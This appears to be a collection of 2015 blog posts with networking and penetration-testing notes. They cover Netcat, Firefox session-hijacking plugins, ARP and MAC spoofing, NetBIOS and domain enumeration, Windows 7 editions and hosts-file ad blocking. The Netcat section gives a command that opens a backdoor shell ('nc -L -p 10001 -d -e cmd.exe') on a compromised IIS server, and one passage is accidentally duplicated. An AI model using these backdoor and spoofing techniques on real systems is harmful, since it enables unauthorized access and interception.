Sunday, October 18, 2015

SSH server freeSSHD

freeSSHd, like it's name says, is a free implementation of an SSH server. It provides strong encryption and authentication over insecure networks like Internet. Users can open remote console or even access their remote files thanks to buit-in SFTP server.

Download : freeSSHd
Tutorial : IBM tutorial 

 add User ..


Friday, October 9, 2015

NetCat – The "Swiss Army Knife"

Port scanning with Netcat
A scanning example from Hobbit is "nc -v -w 2 -z target 20-30".

Netcat as a BackDoor
      So now we have Netcat uploaded to the IIS server, we want to use it to create a
backdoor, in order to get a remote command prompt.

In order to act as a backdoor we need Netcat to listen on a chosen port on the IIS
server (lets choose port 10001) and then we can connect to this port from our
attacking machine...using Netcat of course!
The command we want to give on the server looks like this:

nc -L -p 10001 -d -e cmd.exe
Transferring files using Netcat
     Let's look at other possibilities Netcat can provide. Sat we wanted to transfer a file
called hack.txt to the IIS server, and for some reason we don't want to TFTP the file.
We can use Netcat to transfer files from one system to another.

To receive a file named hack.txt on the destination system start Netcat on the IIS
server with the following command:

nc –l –p 1234 >hack.txt
nc destination 1234 <hack.txt

Windows 7

Windows 7 Home Basic (developing markets only)
Windows 7 Starter
Windows 7 Starter x64
Windows 7 Home Premium
Windows 7 Home Premium (x64)
Windows 7 Home Premium N (European Union only)
Windows 7 Professional
Windows 7 Professional (x64)
Windows 7 Enterprise
Windows 7 Enterprise (x64)
Windows 7 Ultimate
Windows 7 Ultimate (x64)

OEM Versions
One of the biggest secrets in the software world is that Microsoft’s operating systems are
available from online retailers in so-called OEM (“original equipment manufacturer”)
versions (which come in just the Full SKU) that are aimed at the PC builder market. These
are the small “mom and pop”-type PC makers who build hand-crafted machines for local
markets. OEM packaging is bare-bones and does not come with a retail box. Instead, you
get the disc, a Product Key, and a slip of paper describing the product.

OEM versions of Windows 7 differ from retail versions in some important ways:
♦ ♦ They are dramatically cheaper than retail versions.
the OEM versions of Windows 7 are dramatically cheaper than comparable retail
versions. Note, however, that OEM pricing fluctuates somewhat, so the prices you
see online could be a bit different. Shop around for the best prices.
♦ ♦ They do not come with any support from Microsoft. Because PC makers support
the products they sell directly, Microsoft doesn’t offer any support for OEM ver-
sions of Windows 7. This explains the cost differential, by the way.
♦ ♦ You are not really supposed to buy them unless you’re building PCs that you
will sell to others. Technically speaking, OEM versions of Windows 7 are avail-
able only to those who intend to build PCs to sell to others. Furthermore, online
retailers who sell OEM versions of Windows 7 are supposed to verify that you’re a
PC builder and/or sell the products with some kind of hardware. For this reason,
you’ll sometimes be asked to purchase a hardware tchotsky like a USB cable when
you purchase OEM software.
♦ ♦ There’s no box. This shouldn’t matter too much, but you don’t get the cool
Windows 7 retail packaging when you buy OEM. Instead, you pretty much get
an install disc shrink-wrapped to a piece of cardboard and a product key.

Tuesday, October 6, 2015

Block unwanted advertisements with /etc/hosts file on Linux


Now we will make the shell script.
run:

vi /root/update_hosts.sh

Fill the file with the following:
 
#!/bin/bash
cd /tmp
wget http://winhelp2002.mvps.org/hosts.txt
rm /etc/hosts
mv hosts.txt /etc/hosts
cat ~/.etchosts >> /etc/hosts


Now we have to make sure the script is executable: 
chmod +x update_hosts.sh
./update_hosts.sh
For Windows check this : http://winhelp2002.mvps.org/

Firefox plugins

Firesheep – Firefox plugin
     
      Firesheep is a classic Penetration Testing tool used to audit web sessions. 
Firesheep is an extension for the Firefox web browser; however, some versions have been
unstable with recent Firefox releases. Firesheep acts as a packet sniffer that intercepts
unencrypted cookies from websites while they transmit over a network.

Web Developer – Firefox plugin
        Web Developer is an extension for Firefox that adds editing and debugging tools for web developers. 
Web Developer can be downloaded for free from the Firefox plugin store. 
One feature in Web Developer useful for session hijacking is the ability to edit cookies. 
This can be found as a drop-down option from the Firefox browser once Web Developer is installed.

Greasemonkey – Firefox plugin
Greasemonkey is a Firefox plugin that allows users to install scripts that make on the fly changes to web page content before or after the page is loaded. 
Greasemonkey can be used for customizing a web page appearance, web functions, debugging, combining data from other pages, as well as other purposes. 
Greasemonkey is required to make other tools, such as Cookie Injector, function properly.

Cookie Injector – Firefox plugin
Cookie Injector is a user script that simplifies the process of manipulating browser
cookies.
There are a lot of manual steps to import a cookie from a tool like Wireshark into a web browser.
Cookie Injector allows the user to copy paste a cookie portion of a dump, and have the cookies from the dump automatically created on the currently viewed web page.


Getting started with TCPDump

To start off, let's look at the usage specification for TCPDump:

tcpdump [ -AbdDefhHIJKlLnNOpqRStuUvxX ]

[ -B buffer_size ] [ -c count ] [ -C file_size ]

[ -G rotate_seconds ] [ -F file ]

[ -i interface ] [ -j tstamp_type ] [ -m module ] [ -M secret ]

[ -Q in|out|inout ] [ -r file ]

[ -V file ] [ -s snaplen ] [ -T type ] [ -w file ] [ -W filecount ]

[ -E spi@ipaddr algo:secret,... ] [ -y datalinktype ]

[ -z postrotate-command ] [ -Z user ] [ expression ]

Abusing address resolution

The address resolution protocol exists as a service that translates IP addresses
into MAC addresses.
Hosts make ARP requests to obtain information about the MAC address associated with a given IP address.
A host will broadcast a message across the entire local network segment, hoping to receive a response from the host associated with the requested IP address.
The fundamental flaw in the address resolution protocol is that it inherently lacks any form of authentication and message integrity.
This means that, when a response is received for a MAC address lookup, the receiving host has no way of determining its origin, and is left to blindly assume it comes from the correct host. To an attacker, what this means is that you can convince devices to forward you packets that are actually intended for another user by forging responses to ARP requests.
Kali Linux has a tool that helps facilitate ARP abuse; it's called ArpSpoof and following is the usage specification for it:

arpspoof [-ictr] [GATEWAY]

Spoofing MAC addresses

To change your MAC address using Kali Linux, you can use a tool called
macchanger , and use the following command:

macchanger [-hVeaArls] [-m,--mac,--mac= MAC_ADDRESS] INTERFACE

Following is an example of macchanger in action:

ifconfig down eth0
macchanger –-mac=01:02:03:04:05:06 eth0
ifconfig up eth0

Interrogating the Whois servers

whois [IP address]

As an example, here's how you retrieve the Whois record for one of the Google
server addresses:

whois 74.125.233.83

Dumping the NetBIOS Name Table with Nbtstat and Nbtscan

      Another great built-in tool is nbtstat, which calls up the NetBIOS Name Table from a
remote system. The Name Table contains a great deal of information, as shown in the
following example:
C:\>nbtstat -A 192.168.202.33
Local Area Connection:
Node IpAddress: [192.168.234.244] Scope Id: []
NetBIOS Remote Machine Name Table
Name            Type         Status
---------------------------------------------
CAESARS  <00> UNIQUE  Registered
VEGAS2   <00> GROUP    Registered
VEGAS2  <1C> GROUP   Registered
CAESARS <20> UNIQUE Registered
VEGAS2 <1B> UNIQUE Registered
VEGAS2 <1E> GROUP   Registered
VEGAS2 <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
MAC Address = 00-01-03-27-93-8F

       As illustrated, nbtstat extracts the system name (CAESARS), the domain or workgroup
it’s in (VEGAS2), and the Media Access Control (MAC) address.
 These entities can beidentified by their NetBIOS suffixes (the two-digit hexadecimal number to the right of the name), Older versions of Windows would cough up information about any logged-on users in nbtstat output.
 By default on newer versions of Windows, the Messenger service is disabled, thus nbtstat output no longer contains this information.
 logged-on users would normally have an entry in the NetBIOS Name Table for the
Messenger service (see the row beginning with <username>).
Since this service is off by default in newer versions of Windows, the NetBIOS Name Table cannot be used to identify valid account names on the server.

Enumerating Domains with Net View

The net view command is a great example of a built-in enumeration tool.
Net view is an extraordinarily simple command-line utility that will list domains available on the network and then lay bare all machines in a domain. Here’s how to enumerate domains
on the network using net view:
C:\>net view /domain
DomainThe net view command is a great example of a built-in enumeration tool.
Net view is an extraordinarily simple command-line utility that will list domains available on the network and then lay bare all machines in a domain.
Here’s how to enumerate domains on the network using net view:
C:\>net view /domain
Domain
-----------------------------------------------------------------------
CORLEONE
BARZINI_DOMAIN
TATAGGLIA_DOMAIN
BRAZZI
The command completed successfully.
Supplying an argument to the /domain switch will list computers in a particular domain, as shown next:
C:\>net view /domain:corleone
For the command-line challenged, the Network Neighborhood shows essentially the same information shown in these commands.
However, because of the sluggishness of updates to the browse list, we think the command-line tools are snappier and more reliable.

Configuring the Windows Time Service

To configure Windows time service to use an internal hardware clock, follow these steps:

1. Click Start, click Run, type regedit, and then click OK.

2. Locate and then click on the registry subkey HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\Parameters.

3. In the right pane, right-click ReliableTimeSource, and then click Modify.

4. In Edit DWORD Value, type 1 in the Value data box, and then click OK.

5. Locate and then click on the registry subkey HKEY LOCAL MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\Parameters.

6. In the right pane, right-click LocalNTP, and then click Modify.

7. In Edit DWORD Value, type 1 in the Value data box, and then click OK.

8. Quit Registry Editor.

9. At the command prompt, run the net stop w32time && net start w32time command to restart the Windows time service.

10. “Run the w32tm -s command on all computers other than the time server to reset the local computer’s time against the time server.”